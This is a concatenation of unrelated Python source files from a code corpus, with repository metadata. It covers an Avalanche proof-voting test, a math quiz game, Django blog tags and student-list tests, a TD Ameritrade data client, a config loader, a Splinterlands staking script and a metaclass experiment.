proof_seq30 = self.build_conflicting_proof(node, 30)
proof_seq40 = self.build_conflicting_proof(node, 40)
proof_seq50 = self.build_conflicting_proof(node, 50)
proofid_seq30 = FromHex(LegacyAvalancheProof(), proof_seq30).proofid
proofid_seq40 = FromHex(LegacyAvalancheProof(), proof_seq40).proofid
proofid_seq50 = FromHex(LegacyAvalancheProof(), proof_seq50).proofid
node.sendavalancheproof(proof_seq40)
self.wait_until(lambda: proofid_seq40 in get_proof_ids(node))
assert proofid_seq40 in get_proof_ids(node)
assert proofid_seq30 not in get_proof_ids(node)
self.log.info("Test proof acceptance")
def accept_proof(proofid):
self.wait_until(lambda: self.can_find_proof_in_poll(
proofid, response=AvalancheVoteError.ACCEPTED), timeout=5)
return proofid in get_proof_ids(node)
mock_time += self.conflicting_proof_cooldown
node.setmocktime(mock_time)
self.send_and_check_for_polling(peer, proof_seq30)
# Let the quorum vote for it
self.wait_until(lambda: accept_proof(proofid_seq30))
assert proofid_seq40 not in get_proof_ids(node)
self.log.info("Test the peer replacement rate limit")
# Wait until proof_seq30 is finalized
with node.assert_debug_log([f"Avalanche accepted proof {proofid_seq30:0{64}x}, status 3"]):
self.wait_until(lambda: not self.can_find_proof_in_poll(
proofid_seq30, response=AvalancheVoteError.ACCEPTED))
# Not enough
assert self.conflicting_proof_cooldown < self.peer_replacement_cooldown
mock_time += self.conflicting_proof_cooldown
node.setmocktime(mock_time)
peer = get_ava_p2p_interface(node)
with node.assert_debug_log(["Not polling the avalanche proof (cooldown-not-elapsed)"]):
self.send_proof(peer, proof_seq50)
mock_time += self.peer_replacement_cooldown
node.setmocktime(mock_time)
self.log.info("Test proof rejection")
self.send_proof(peer, proof_seq50)
self.wait_until(lambda: proofid_seq50 in get_proof_ids(node))
assert proofid_seq40 not in get_proof_ids(node)
def reject_proof(proofid):
self.wait_until(
lambda: self.can_find_proof_in_poll(
proofid, response=AvalancheVoteError.INVALID))
return proofid not in get_proof_ids(node)
self.wait_until(lambda: reject_proof(proofid_seq50))
assert proofid_seq50 not in get_proof_ids(node)
assert proofid_seq40 in get_proof_ids(node)
self.log.info("Test proof invalidation")
def invalidate_proof(proofid):
self.wait_until(
lambda: self.can_find_proof_in_poll(
proofid, response=AvalancheVoteError.INVALID))
return try_rpc(-8, "Proof not found",
node.getrawavalancheproof, f"{proofid:0{64}x}")
self.wait_until(lambda: invalidate_proof(proofid_seq50))
self.log.info("The node will now ignore the invalid proof")
for i in range(5):
with node.assert_debug_log(["received: avaproof"]):
self.send_proof(peer, proof_seq50)
assert_raises_rpc_error(-8,
"Proof not found",
node.getrawavalancheproof,
f"{proofid_seq50:0{64}x}")
if __name__ == '__main__':
AvalancheProofVotingTest().main()
| 2.0625 | 2 |
quoteline.py | G4me4u/typeformer | 0 | 12767437 | <reponame>G4me4u/typeformer<filename>quoteline.py
class QuoteLine:
def __init__(self, lineText, lineNumber, origin):
self.lineText = lineText
self.lineNumber = lineNumber
self.origin = origin
self.renderedLine = None
def renderLine(self, font, color):
'''
Renders the line using the given font and color.
'''
self.renderedLine = font.render(self.lineText, False, color)
def discardRenderedLine(self):
'''
Discards the rendered line (self.renderedLine = None)
'''
self.renderedLine = None | 2.53125 | 3 |
# Source file: tests/integration/__init__.py (JawboneHealth/jhhalchemy)
"""
Integration tests
"""
# -*- coding: utf-8 -*-
# Source file: src/max10_generate.py (krtkr/altera_kicad_gen)
'''
Created on 20 июл. 2017 г.
@author: krtkr
'''
import sys
import getopt
from KicadSymGen.draw import Library
from KicadSymGen.generate import Generator
from KicadSymGen.generate import Layout
from KicadSymGen.parse.altera import Max10Reader
from KicadSymGen.parse.altera import Max10Parser
def print_help():
print('max10_generate.py -p <pinouts_path> -d <dcm_file> -l <lib_file>')
if __name__ == '__main__':
verbose = False
pinouts_path = "../docs/max10"
dcm_file_path = './max10.dcm'
lib_file_path = './max10.lib'
try:
opts, args = getopt.getopt(sys.argv[1:], "hvp:d:l:",["pinouts=","dcm=","lib="])
except getopt.GetoptError:
print_help()
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print_help()
sys.exit()
elif opt == '-v':
verbose = True
elif opt in ("-p", "--pinouts"):
pinouts_path = arg
elif opt in ("-d", "--dcm_file"):
dcm_file_path = arg
elif opt in ("-l", "--lib_file"):
lib_file_path = arg
parse = Max10Parser(list())
layout = Layout()
max10Reader = Max10Reader(pinouts_path)
generator = Generator(max10Reader, parse, layout)
if generator.generate():
print("Done generating, write Library")
library = Library()
library.save(lib_file_path, dcm_file_path, generator.symbols)
print("Done writing Library, finish")
else:
print("Error: failed to generate")
pass
| 2.234375 | 2 |
# -*- encoding: utf-8 -*-
# Source file: utils/ConstantUtils.py (JoeBuzh/DeepWater)
'''
@Filename : ConstantUtils.py
@Datetime : 2020/09/27 17:10:12
@Author : Joe-Bu
@version : 1.0
'''
from enum import Enum
class MonitorItem(Enum):
"""
Water Monitoring Items.
"""
ITEMS = ['watertemp', 'pH', 'DO', 'conductivity', 'turbidity']
INDEX = ['codmn', 'nh3n', 'tp', 'tn']
@classmethod
def items_len(cls) -> int:
return len(MonitorItem.ITEMS.value)
@classmethod
def index_len(cls) -> int:
return len(MonitorItem.INDEX.value) | 2.734375 | 3 |
# Source file: waldren/base/td_db_client.py (waldren/tradekit)
from tda import auth, client
#from tda.orders import EquityOrderBuilder, Duration, Session
import json
import CONFIG as config
import datetime
from datetime import timedelta
import pandas as pd
import os
import sys
import psycopg2
class Client:
def __init__(self, config=config):
self.config = config
self.td = self.authenticate_tda()
self.conn = self.getDataBaseConnection()
# authenticate to TD Ameritrade API
def authenticate_tda(self):
try:
return auth.client_from_token_file(self.config.TOKEN_PATH, self.config.API_KEY)
except FileNotFoundError:
from selenium import webdriver
with webdriver.Chrome(executable_path=self.config.CHROME_DRIVER_PATH) as driver:
return auth.client_from_login_flow(
driver, self.config.API_KEY, self.config.REDIRECT_URL, self.config.TOKEN_PATH)
#Establish DB Connection
def getDataBaseConnection(self):
connection = psycopg2.connect(
host=self.config.DB_HOST,
database=self.config.DATABASE,
user=self.config.DB_USER,
password=<PASSWORD>,
)
return connection
def get_freq_type_str(self, frequency_type):
if frequency_type == client.Client.PriceHistory.FrequencyType.DAILY:
return 'daily'
if frequency_type == client.Client.PriceHistory.FrequencyType.MINUTE:
return 'minute'
if frequency_type == client.Client.PriceHistory.FrequencyType.WEEKLY:
return 'weekly'
if frequency_type == client.Client.PriceHistory.FrequencyType.MONTHLY:
return 'monthly'
return 'other'
def get_year_period(self, years):
if years == 1:
return client.Client.PriceHistory.Period.ONE_YEAR
elif years == 2:
return client.Client.PriceHistory.Period.TWO_YEARS
elif years == 3:
return client.Client.PriceHistory.Period.THREE_YEARS
elif years == 5:
return client.Client.PriceHistory.Period.FIFTEEN_YEARS
elif years == 10:
return client.Client.PriceHistory.Period.TEN_YEARS
elif years == 15:
return client.Client.PriceHistory.Period.FIFTEEN_YEARS
elif years == 20:
return client.Client.PriceHistory.Period.TWO_YEARS
else:
print("year must be an integer in (1, 2, 3, 5, 10, 15, 20")
def convert_symbol_price_hx_todataframe(self, res):
if res['empty'] == True:
print("****Empty result****")
return pd.DataFrame()
rows_list = []
#df = pd.DataFrame(columns = ['datetime', 'open', 'high', 'low', 'close','volume'])
for row in res['candles']:
rows_list.append(row)
df = pd.DataFrame(rows_list)[['datetime', 'open', 'high', 'low', 'close','volume']]
df['datetime'] = pd.to_datetime(df['datetime'], unit='ms', utc=True)
df.set_index('datetime', inplace=True, drop=True)
return df
def get_price_history(self, **kwargs):
# call the TD API and grab the json
r = self.td.get_price_history(**kwargs)
j = r.json()
# Make sure there are candles to know that it is not an error
if 'candles' not in j:
print("**** No Candles in Result****")
print(r.json())
return pd.DataFrame()
# If there are candles, make sure the result is not empty
if j['empty'] == True:
print("****Empty result****")
return pd.DataFrame()
# get the dataframe from the candles and save the dataframe as a CSV file
df = self.convert_symbol_price_hx_todataframe(j)
return df
def get_fundamentals(self, symbol):
r = self.td.search_instruments(symbol, client.Client.Instrument.Projection.FUNDAMENTAL)
j = r.json()
try:
fund = j[symbol]['fundamental']
fund['datetime'] = datetime.datetime.now()
except:
try:
# We have have sent too many API calls, stop the program
if j['error'] == "Individual App\'s transactions per seconds restriction reached. Please contact us with further questions":
sys.exit(1)
except:
# Must have been another error, print the JSON and then set fund to None
print("ERROR=============")
print(j)
print("==================")
fund = None
return fund
'''
Function to get a standand intraday candles for every 5 minutes for the supplied period. Period type
is `DAY`
'''
def get_price_intraday_history(self, symbol, period=client.Client.PriceHistory.Period.THREE_MONTHS):
period_type=client.Client.PriceHistory.PeriodType.DAY
frequency_type=client.Client.PriceHistory.FrequencyType.MINUTE
frequency=client.Client.PriceHistory.Frequency.EVERY_FIVE_MINUTES
return self.get_price_history(symbol=symbol,period_type=period_type,period=period,frequency_type=frequency_type,frequency=frequency)
'''
Function to get a standand daily candles for the supplied period. Period type
is `YEAR`
'''
def get_price_daily_history(self, symbol, period=client.Client.PriceHistory.Period.TWENTY_YEARS):
period_type=client.Client.PriceHistory.PeriodType.YEAR
frequency_type=client.Client.PriceHistory.FrequencyType.DAILY
frequency=client.Client.PriceHistory.Frequency.DAILY
return self.get_price_history(symbol=symbol,period_type=period_type,period=period,frequency_type=frequency_type,frequency=frequency)
def get_standard_5min_price_history(self, start_datetime, symbol):
frequency_type=client.Client.PriceHistory.FrequencyType.MINUTE
frequency=client.Client.PriceHistory.Frequency.EVERY_FIVE_MINUTES
end_datetime = datetime.datetime.now()
return self.get_price_history(symbol=symbol,end_datetime=end_datetime, start_datetime=start_datetime,frequency_type=frequency_type,frequency=frequency)
'''
Database Functions
'''
'''
Run a select query and get back a rowset
'''
def run_select_query(self, query):
cursor = self.conn.cursor()
cursor.execute(query)
row = cursor.fetchall()
cursor.close()
return row
'''
Run a select query with a parameter and get back a rowset
'''
def run_select_query_with_param(self, query, param):
cursor = self.conn.cursor()
cursor.execute(query, param)
row = cursor.fetchall()
if len(row) == 0:
print("There are no results for this query")
cursor.close()
return row
'''
Returns a list of tuples (stock_id, symbol). If exchance provided, it will limit stocks to only from that exchange.
When includevariants is False is will exclude stocks symbols for stock variants (ie. AVD^C)
'''
def get_stocks_id_symbol(self, exchange=None, includevariants=False):
cursor = self.conn.cursor()
if exchange is None:
if not includevariants:
cursor.execute("SELECT id, symbol FROM stock WHERE symbol NOT SIMILAR TO %s ", ('%(\^|/)%',))
else:
cursor.execute("SELECT id, symbol FROM stock")
else:
if not includevariants:
cursor.execute("SELECT id, symbol FROM stock WHERE symbol NOT SIMILAR TO %s AND exchange = %s", ('%(\^|/)%',exchange,))
else:
cursor.execute("SELECT id, symbol FROM stock WHERE exchange = %s", (exchange,))
stocks = []
rows = cursor.fetchall()
for row in rows:
stocks.append((row[0], row[1]))
cursor.close()
return stocks
'''
Save the JSON fundamentals from TD Ameritrade API for a stock. stock_id is the primary key for the stock in the database.
'''
def save_fundamentals(self, stock_id, fund):
if fund is None:
print("No Fundamentals json provided")
else:
cursor = self.conn.cursor()
query_insert = "INSERT INTO stock_fundamental (dt, stock_id, fundamental_id, val) VALUES (%s,%s,%s,%s)"
dt = fund['datetime']
keys = fund.keys()
for k in keys:
if k not in ['datetime', 'symbol', 'dividendDate', 'dividendPayDate']:
cursor.execute(query_getfund, (k,))
r = cursor.fetchone()
if r is not None:
cursor.execute(query_insert, (dt, stock_id, r[0], fund[k]))
else:
print("{} symbol not found in fundamental table".format(k))
self.conn.commit()
cursor.close()
def save_price_history(self, stock_id, start_datetime, symbol):
cursor = self.conn.cursor()
df = self.get_standard_5min_price_history(start_datetime, symbol)
query_insert = "INSERT INTO ohlc_data (dt, stock_id, open, high, low, close, volume ) VALUES(%s, %s, %s, %s, %s, %s, %s)"
for index, r in df.iterrows():
cursor.execute(query_insert, (r.name, stock_id, r['open'],r['high'],r['low'],r['close'],r['volume'],))
self.conn.commit()
cursor.close()
| 2.5 | 2 |
# Source file: prometheus_adaptive_cards/config/settings_raw.py (trallnag/prometheus-adaptive-cards)
"""
Module made to merge and process all configs for PromAC into a single nested
dictionary. Ready to be injected into the settings models that PromAC uses.
Copyright © 2020 <NAME> - Licensed under the Apache License 2.0
"""
import os
from box import Box
from loguru import logger
import prometheus_adaptive_cards.config.settings_utils as settings_utils
def _parse_args(args: list[str]) -> Box:
"""Parses arguments into nested dict.
Args:
args (list[str]):
List of all arguments passed to program. Use it like this:
`parse_args(sys.argv[1:])`. Args must start with one or two dashes
and only contain lower case chars, period and underscores.
Returns:
Box:
Lowercased. Box instead of dict. Already nested. Can be used just
like a dictionary. Read more [here](https://github.com/cdgriffith/Box).
Type casting is NOT done here. `box_dots` is `True`.
"""
logger.bind(args_to_parse=args).debug("Parse list of arguments.")
if len(args) % 2 != 0:
raise ValueError("Number of args must be not odd.")
names, values = args[::2], args[1::2]
cli_args_dict = {}
for idx in range(len(names)):
name = names[idx]
value = values[idx]
if name.startswith("--"):
cli_args_dict[name[2:]] = value
elif name.startswith("-"):
cli_args_dict[name[1:]] = value
return Box(settings_utils.unflatten(cli_args_dict), box_dots=True)
def _parse_files(
force_file: str or None = None, lookup_override: list[str] or None = None
) -> dict[str]:
"""Parses config from files and merges them together.
Args:
force_file (str or None, optional):
If set, this location will be the only one checked (in addition to
`.local.`). Should point to arg from CLI or env var. Defaults to `None`.
lookup_override (list[str] or None, optional):
If set, the given list of locations will be used to look for files
instead of the included one. Should generally only be necessary
during unit testing. Defaults to `None`.
Returns:
dict[str]: Represents the merged version of all found YAML files. If no
files have been parsed the returned `dict` will be empty.
"""
logger.bind(force_file=force_file, lookup_override=lookup_override).debug(
"Parse and merge files."
)
if force_file:
logger.debug(f"Only file '{force_file}' is considered.")
locations = settings_utils.generate_locations([force_file])
else:
locations = settings_utils.generate_locations(
lookup_override
or [
f"{os.path.dirname(__file__)}/promac.yml",
"/etc/promac/promac.yml",
]
)
configs = settings_utils.parse_yamls(locations)
settings = {}
if len(configs) > 1:
settings = configs[0]
settings_utils.merge(settings, configs[1:])
elif len(configs) > 0:
settings = configs[0]
return settings
def _parse_env_vars(all_env_vars: dict[str, str]) -> Box:
"""Extracts and transforms given dict of env vars.
Args:
all_env_vars (dict[str, str]): Environment variables.
Returns:
Box:
Lowercased. Box instead of dict. Already nested. Can be used just
like a dictionary. Read more [here](https://github.com/cdgriffith/Box).
Type casting is NOT done here. `box_dots` is `True`.
"""
logger.bind(all_env_vars=all_env_vars).debug("Parse env vars.")
env_vars = {}
for name, value in all_env_vars.items():
if name.startswith("PROMAC__") and len(name) > 8:
env_vars[name[8:].lower().replace("__", ".")] = value
return Box(settings_utils.unflatten(env_vars), box_dots=True)
def _cast_vars(box: Box) -> None:
"""Casts box fields to correct type in-place. No content validation.
Args:
box (Box): Nested Box with `box_dots=True`.
"""
logger.debug("Cast vars.")
settings_utils.cast(box, "logging.structured.custom_serializer", bool)
settings_utils.cast(box, "logging.unstructured.colorize", bool)
settings_utils.cast(box, "server.port", int)
def setup_raw_settings(cli_args: list[str], env: dict[str, str]) -> dict:
"""Creates one single dict that contains all settings for PromAC.
Args:
args (list[str]):
List of all arguments passed to program. Use it like this:
`parse_args(sys.argv[1:])`. Args must start with one or two dashes
and only contain lower case chars, period and underscores.
env (dict[str, str]): Dict with all enviornment variables.
Returns:
dict: Nested dictionary with all settings unvalidated.
"""
logger.debug("Parse CLI args with argparse.")
cli_args_box = _parse_args(cli_args)
logger.debug("Find, parse and merge YAML config files.")
config_file = cli_args_box.get("config_file", os.environ.get("CONFIG_FILE", None))
collected_settings_dict = _parse_files(force_file=config_file)
logger.debug("Extract and parse relevant env vars and merge into settings.")
env_vars_box = _parse_env_vars(env)
_cast_vars(env_vars_box)
settings_utils.merge(collected_settings_dict, env_vars_box.to_dict())
logger.debug("Extract and parse relevant CLI args")
if cli_args_box.get("config_file"):
del cli_args_box["config_file"]
_cast_vars(cli_args_box)
settings_utils.merge(collected_settings_dict, cli_args_box.to_dict())
return collected_settings_dict
| 2.890625 | 3 |
#!/usr/bin/env python
# Source file: mathgame.py (rg3/mathgame)
# SPDX-FileCopyrightText: 2021 <NAME> <<EMAIL>>
# SPDX-License-Identifier: MIT
import random
import sys
class Operation(object):
def valid (self, a, b):
return True
def result(self, a, b):
raise TypeError
def symbol(self):
raise TypeError
class Addition(Operation):
def __init__(self):
pass
def result(self, a, b):
return a+b
def symbol(self):
return "+"
class Multiplication(Operation):
def __init__(self):
pass
def result(self, a, b):
return a*b
def symbol(self):
return "*"
class Substraction(Operation):
def __init__(self):
pass
def valid(self, a, b):
return a >= b
def result(self, a, b):
return a-b
def symbol(self):
return "-"
class TableGenerator(object):
def __init__(self, used_operation):
self.usedOperation = used_operation
def table(self, a):
result = []
for i in range(1,10+1):
if self.usedOperation.valid(a, i):
result.append((a, i))
return result
class Game(object):
def __init__(self, table_generator, used_operation, combiner_min, combiner_max):
self.tableGenerator = table_generator
self.usedOperation = used_operation
self.combinations = []
for i in range(combiner_min, combiner_max+1):
self.combinations.extend(self.tableGenerator.table(i))
self.quitAnswer = "q"
def run(self):
print("Welcome! To quit the game, answer '%s' to any question" % (self.quitAnswer,))
questions = []
while True:
if len(questions) == 0:
questions = self.combinations[:]
random.shuffle(questions)
next_idx = random.choice(range(0, len(questions)))
question = questions[next_idx]
del questions[next_idx]
continue_playing = self.ask(question)
if not continue_playing:
break
def ask(self, question):
correct_sign = "\u2713 Yes!"
incorrect_sign = "\u2717 No"
a, b = question
correct_answer = self.usedOperation.result(a, b)
while True:
answer = input("%s %s %s = " % (a, self.usedOperation.symbol(), b))
if answer.lower() == self.quitAnswer:
return False
try:
numerical_answer = int(answer)
if numerical_answer == correct_answer:
print(correct_sign)
break
else:
print(incorrect_sign)
except ValueError:
print(incorrect_sign)
return True
if __name__ == "__main__":
def usage():
sys.exit("Usage: %s add|sub|mul NUMBER_FROM_1_TO_10" % (sys.argv[0], ))
if len(sys.argv) != 3:
usage()
operation_arg = sys.argv[1]
max_table_arg = sys.argv[2]
operation_classes = dict()
operation_classes['add'] = Addition
operation_classes['sub'] = Substraction
operation_classes['mul'] = Multiplication
if operation_arg not in operation_classes:
usage()
used_operation = operation_classes[operation_arg]()
table_generator = TableGenerator(used_operation)
try:
max_value = int(max_table_arg)
if max_value < 1 or max_value > 10:
raise ValueError
except ValueError:
usage()
game = Game(table_generator, used_operation, 1, max_value)
try:
game.run()
except KeyboardInterrupt:
print("\n")
| 3.4375 | 3 |
blog/templatetags/blog_tags.py | masod-abbasian/mysite | 2 | 12767444 | <filename>blog/templatetags/blog_tags.py
from django import template
from blog.models import POST,Comment
from blog.models import Category
register = template.Library()
@register.simple_tag(name="totalposts")
def function():
posts = POST.objects.filter(status=1).count()
return posts
@register.simple_tag(name="comments_count")
def function(pid):
return Comment.objects.filter(post = pid,approved=True).count()
@register.simple_tag(name="posts")
def function():
posts = POST.objects.filter(status=1)
return posts
@register.filter
def snippet(value,arg=20):
return value[:arg] + "..."
@register.inclusion_tag('blog/blog-popular-post.html')
def latestposts(arg=2):
postes = POST.objects.filter(status=1).order_by('-published_date')[:arg]
return {'postes':postes}
@register.inclusion_tag('blog/blog-category.html')
def postcategory():
posts = POST.objects.filter(status=1)
categories = Category.objects.all()
cat_dict = {}
for name in categories:
cat_dict[name] = posts.filter(category = name).count()
return {'categories': cat_dict}
| 2.375 | 2 |
sps-auto-utilities.py | 0xBXIII/SPS-Auto-Utilities | 3 | 12767445 | <reponame>0xBXIII/SPS-Auto-Utilities
from beem import Hive
from beem.account import Account
import beemgraphenebase.ecdsasig
from binascii import hexlify
from datetime import datetime
from time import time
import requests
import sys
import yaml
from yaml.loader import SafeLoader
APP_NAME = 'sps-auto-utilities'
def stake(hive: Hive, hive_name: str, sps: float):
    """Broadcast a custom_json operation staking *sps* SPS for *hive_name*."""
    payload = f"{{\"token\":\"SPS\",\"qty\":{sps},\"app\":\"{APP_NAME}\"}}"
    hive.custom_json(
        "sm_stake_tokens",
        required_posting_auths=[hive_name],
        json_data=payload,
    )
    # Log the staked amount with a timestamp prefix.
    now = datetime.now()
    print(f"{now} | {hive_name} | Staked {sps}")
def claim_hive_sps_airdrop(hive_name: str, posting_key: str):
    """Log in to Splinterlands as *hive_name* and claim the SPS airdrop
    for HIVE-side assets.

    Errors are reported on stderr and the function returns without raising,
    so one failing account does not abort the surrounding account loop.

    Fixes vs. original: the two bare ``except:`` clauses (which also
    swallowed KeyboardInterrupt/SystemExit) are narrowed to ``Exception``,
    and the success message now goes to stdout like stake()'s log instead
    of stderr.
    """
    # Login: the API expects "<name><timestamp>" signed with the posting key.
    timestamp = int(time() * 1000)
    sig_bytes = beemgraphenebase.ecdsasig.sign_message(f"{hive_name}{timestamp}", posting_key)
    signature = hexlify(sig_bytes).decode("ascii")
    token = None
    try:
        login_response = requests.get(f"https://api2.splinterlands.com/players/login?name={hive_name}&ts={timestamp}"
                                      f"&sig={signature}").json()
        token = login_response['token']
    except Exception:
        print(f"ERROR: Could not log in to Splinterlands for token with account {hive_name}", file=sys.stderr)
        return
    # Claim: second signature over "hive<name><timestamp>".
    try:
        claim_sig_bytes = beemgraphenebase.ecdsasig.sign_message(f"hive{hive_name}{timestamp}", posting_key)
        claim_signature = hexlify(claim_sig_bytes).decode("ascii")
        result = requests.get(f"https://ec-api.splinterlands.com/players/claim_sps_airdrop?platform=hive&address={hive_name}"
                              f"&sig={claim_signature}&token={token}&username={hive_name}&ts={timestamp}")
        if result.json()['success'] is True:
            timestamp = datetime.now()
            # Normal-operation log line: stdout, matching stake().
            print(f"{timestamp} | {hive_name} | Claimed SPS Airdrop from HIVE Assets")
    except Exception:
        print(f"ERROR: Could not claim HIVE SPS airdrop with account {hive_name}", file=sys.stderr)
        return
# --- Script entry point -----------------------------------------------------
# Usage: python sps-auto-utilities.py <config.yml>
if len(sys.argv) != 2:
    print('ERROR: Invalid usage - please only supply exactly one config file path', file=sys.stderr)
    exit(1)
# Load the YAML config describing the Hive node and the accounts to process.
with open(sys.argv[1]) as config_file:
    config = yaml.load(config_file, Loader=SafeLoader)
hive_node = config['hive-node']
for account in config['accounts']:
    # Wallet Setup: collect whichever keys the config supplies.
    hive_name = account['name']
    keys = []
    has_active_key = False  # NOTE(review): set but never read below — confirm intent
    if 'posting-key' in account.keys():
        keys.append(account['posting-key'])
    if 'active-key' in account.keys():
        has_active_key = True
        keys.append(account['active-key'])
    if len(keys) == 0:
        # No usable keys: skip this account entirely.
        print(f"ERROR: No keys for {hive_name}", file=sys.stderr)
        continue
    hive = Hive(keys=keys, node=hive_node)
    hive_account = Account(hive_name, blockchain_instance=hive)
    # Find how much SPS is liquid
    # This does NOT include airdrops
    balances = []
    try:
        balances = requests.get(f'https://api.splinterlands.io/players/balances?username={hive_name}').json()
    except:
        print(f"ERROR: Could not fetch Splinterlands balances for {hive_name}", file=sys.stderr)
        continue
    sps = 0  # Defaulting to 0 to claim only
    # Pick the SPS entry out of the balance list, if present.
    for balance in balances:
        if balance['token'] == 'SPS':
            sps = balance['balance']
            break
    # Run each configured action for this account.
    # NOTE(review): 'claim-hive-sps-airdrop' reads account['posting-key']
    # directly and would raise KeyError if only an active key was supplied.
    for action in account['actions']:
        if action == 'stake':
            stake(hive, hive_name, sps)
        elif action == 'claim-hive-sps-airdrop':
            claim_hive_sps_airdrop(hive_name, account['posting-key'])
        else:
            print(f"ERROR: Invalid action ({action}) supplied for {hive_name}", file=sys.stderr)
| 2.203125 | 2 |
students/tests/test_student_views.py | ovod88/studentsdb | 0 | 12767446 | from datetime import datetime
from django.test import TestCase, Client
from django.urls import reverse
from students.models.students import Student
from students.models.groups import Group
class TestStudentList(TestCase):
    """View tests for the students list (home) page: rendering, filtering
    by the current_group cookie, ordering, reverse ordering and pagination."""

    def setUp(self):
        """Create two groups and four students, then prepare a test client."""
        # create 2 groups
        group1, created = Group.objects.get_or_create(
            title="MtM-1")
        group2, created = Group.objects.get_or_create(
            title="MtM-2")
        # create 4 students: 1 for group1 and 3 for group2
        Student.students.get_or_create(
            first_name="Vitaliy",
            last_name="Podoba",
            birthday=datetime.today(),
            ticket='12345',
            student_group=group1)
        Student.students.get_or_create(
            first_name="John",
            last_name="Dobson",
            birthday=datetime.today(),
            ticket='23456',
            student_group=group2)
        Student.students.get_or_create(
            first_name="Sam",
            last_name="Stefenson",
            birthday=datetime.today(),
            ticket='34567',
            student_group=group2)
        Student.students.get_or_create(
            first_name="Arnold",
            last_name="Kidney",
            birthday=datetime.today(),
            ticket='45678',
            student_group=group2)
        # remember test browser
        self.client = Client()
        # remember url to our homepage
        self.url = reverse('home')

    def test_students_list(self):
        """Home page renders, shows students, edit links, and 3 per page."""
        # make request to the server to get homepage page
        response = self.client.get(self.url)
        # print(response.context)
        # have we received OK status from the server?
        self.assertEqual(response.status_code, 200)
        # do we have student name on a page?
        self.assertIn('Vitaliy', str(response.content))
        # do we have link to student edit form?
        self.assertIn(reverse('students_edit',
                              kwargs={'pk': Student.students.all()[0].id}),
                      str(response.content))
        # ensure we got 3 students, pagination limit is 3
        self.assertEqual(len(response.context['students']), 3)

    def test_current_group(self):
        """current_group cookie limits the listing to that group's students."""
        # # set group1 as currently selected group
        group = Group.objects.filter(title="MtM-1")[0]
        self.client.cookies['current_group'] = group.id
        # # make request to the server to get homepage page
        response = self.client.get(self.url)
        # # in group1 we have only 1 student
        self.assertEqual(len(response.context['students']), 1)

    def test_order_by(self):
        """order_by=last_name sorts students alphabetically by last name."""
        # # set order by Last Name
        response = self.client.get(self.url, {'order_by': 'last_name'})
        # # now check if we got proper order
        students = response.context['students']
        self.assertEqual(students[0].last_name, 'Dobson')
        self.assertEqual(students[1].last_name, 'Kidney')
        self.assertEqual(students[2].last_name, 'Podoba')

    def test_reverse_order_by(self):
        """reverse=1 inverts the requested ordering (here: by ticket)."""
        # # order students by ticket number in reverse order
        response = self.client.get(self.url, {'order_by': 'ticket',
                                              'reverse': '1'})
        # # now check if we got proper order
        students = response.context['students']
        self.assertEqual(students[0].last_name, 'Kidney')
        self.assertEqual(students[1].last_name, 'Stefenson')
        self.assertEqual(students[2].last_name, 'Dobson')

    def test_pagination(self):
        """Page 2 holds the single student overflowing the 3-per-page limit."""
        # # navigate to second page with students
        response = self.client.get(self.url, {'page': '2'})
        # self.assertEqual(response.context['is_paginated'], True)
        self.assertEqual(len(response.context['students']), 1)
        self.assertEqual(response.context['students'][0].last_name, 'Stefenson')
| 2.5625 | 3 |
research/test_singleton.py | FXTD-ODYSSEY/QBinder | 13 | 12767447 | <filename>research/test_singleton.py
# -*- coding: utf-8 -*-
"""
"""
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
__author__ = 'timmyliang'
__email__ = '<EMAIL>'
__date__ = '2020-10-30 19:42:26'
import inspect
import threading
from PySide2 import QtCore
class SingletonType(type):
    """Metaclass making every class that uses it a thread-safe singleton.

    The first instantiation creates and caches the instance under a shared
    lock (double-checked locking); later calls return the cached instance.

    NOTE(review): hasattr() also finds an ``_instance`` inherited from a
    base class, so a subclass would reuse its parent's singleton — confirm
    whether that is intended.
    """
    # Single lock shared by every class using this metaclass.
    _instance_lock = threading.Lock()

    def __init__(cls, name, bases, dic):
        super(SingletonType, cls).__init__(name, bases, dic)
        # print(cls,name,bases,dic)

    def __call__(cls, *args, **kwargs):
        # print(args)
        # Double-checked locking: cheap unlocked test first, then re-check
        # under the lock before constructing the one instance.
        if not hasattr(cls, "_instance"):
            with SingletonType._instance_lock:
                if not hasattr(cls, "_instance"):
                    cls._instance = super(SingletonType,cls).__call__(*args, **kwargs)
                    # NOTE(review): assumes the instance defines __addvar__;
                    # no such method is visible in this file — confirm.
                    cls._instance.__addvar__(*args)
        return cls._instance
    # def __new__(cls, name, bases, attrs):
    #     # print(name,bases,attrs)
    #     return super(SingletonType,cls).__new__(cls, name, bases, attrs)
class Binding(object):
    """Wrap a single value for the data-binding experiments.

    The descriptor-protocol hooks are intentionally disabled; they are
    kept below as comments for reference.
    """

    def __init__(self, val):
        super(Binding, self).__init__()
        self.__val = val

    # Disabled descriptor hooks:
    # def __get__(self, instance, owner):
    #     return self.__val
    # def __set__(self, instance, val):
    #     self.__val = val
class GBinding(Binding):
    """Marker subclass distinguishing "G" bindings; adds no behavior."""
class DataBinding(type):
    """Metaclass that scans each newly created class for Binding-valued
    attributes and (for now) prints every one it finds."""

    def __init__(cls, name, bases, attrs):
        super(DataBinding, cls).__init__(name, bases, attrs)
        for attr_name, attr_value in inspect.getmembers(cls):
            if isinstance(attr_value, Binding):
                print(attr_name, attr_value)
def connect_binding(cls):
    """Class decorator: rebuild *cls* through the DataBinding metaclass.

    Technique from
    https://stackoverflow.com/questions/11091609/setting-a-class-metaclass-using-a-decorator
    """
    namespace = dict(cls.__dict__)
    namespace["__metaclass__"] = DataBinding
    namespace["__wrapped__"] = cls
    return DataBinding(cls.__name__, cls.__bases__, namespace)
class StateDescriptor(QtCore.QObject):
    """State container: both obj["key"] and obj.key read/write the
    instance __dict__ directly.

    NOTE(review): __setattr__ writes __dict__ itself instead of calling
    super().__setattr__, bypassing QObject's attribute handling — confirm
    this is intentional.
    """
    def __getitem__(self,key):
        return self.__dict__[key]
    def __setitem__(self,key,value):
        self.__dict__[key] = value
    def __setattr__(self, key, value):
        # Debug trace of every attribute write.
        print("attr",key,value)
        self.__dict__[key] = value
@connect_binding
class Component(object):
    # Class-level shared state container; the attribute assignments below
    # go through StateDescriptor.__setattr__ (which prints each write).
    state = StateDescriptor()
    state.number = 1
    state.string = "1"
    state.loc = True
    def __init__(self,*args,**kwargs):
        super(Component, self).__init__(*args,**kwargs)
        # Read back two of the class-level state values and echo them.
        number = self.state.number
        string = self.state.string
        print(number,string)
# Instantiate once to exercise the binding machinery (prints state values).
comp = Component()
# print(dir(comp.temple))
